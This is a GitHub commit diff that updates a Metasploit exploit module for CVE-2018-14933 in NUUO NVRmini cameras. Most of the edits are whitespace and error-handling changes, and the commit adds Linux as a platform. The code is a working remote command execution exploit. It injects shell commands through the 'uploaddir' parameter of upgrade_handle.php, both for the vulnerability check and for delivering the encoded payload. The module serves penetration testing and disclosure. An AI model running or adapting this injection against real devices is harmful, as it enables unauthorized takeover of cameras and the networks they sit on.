Update nuuo_nvrmini_upgrade_rce.rb

GSoC/Meterpreter_Web_Console
Berk Dusunur 2018-12-06 06:19:16 +03:00 committed by GitHub
parent 3ac5096e1a
commit c72065987b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 19 deletions

View File

@ -10,28 +10,28 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info={})
super(update_info(info,
'Name' => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
'Description' => %q{
'Name' => 'NUUO NVRmini - upgrade_handle.php Remote Command Execution',
'Description' => %q{
NUUO NVRmini ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
'License' => MSF_LICENSE,
'Author' =>
[
'Berk Dusunur <@berkdusunur>',
'numan turle <@numanturle>'
],
'References' =>
'References' =>
[
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],
['CVE', '2018-14933'],
['EDB', '45070']
],
'Privileged' => false,
'Payload' =>
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => %w{ unix win },
'Platform' => %w{ unix win linux },
'Arch' => ARCH_CMD,
'Targets' => [ ['NUUO NVRmini', { }], ],
'DisclosureDate' => 'Aug 04 2018',
@ -41,13 +41,17 @@ class MetasploitModule < Msf::Exploit::Remote
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
'vars_get' =>
'uri' => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"
}
})
unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end
if res.code == 200 and res.body =~ /upload_tmp_dir/
return Exploit::CheckCode::Vulnerable
end
@ -57,20 +61,14 @@ class MetasploitModule < Msf::Exploit::Remote
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'cmd' => 'writeuploaddir',
'uploaddir' => "';"+cmd+";'"
}
})
unless res
fail_with(Failure::Unknown, 'Failed to execute the command.')
end
res
end
def exploit
http_send_command(payload.encoded)
end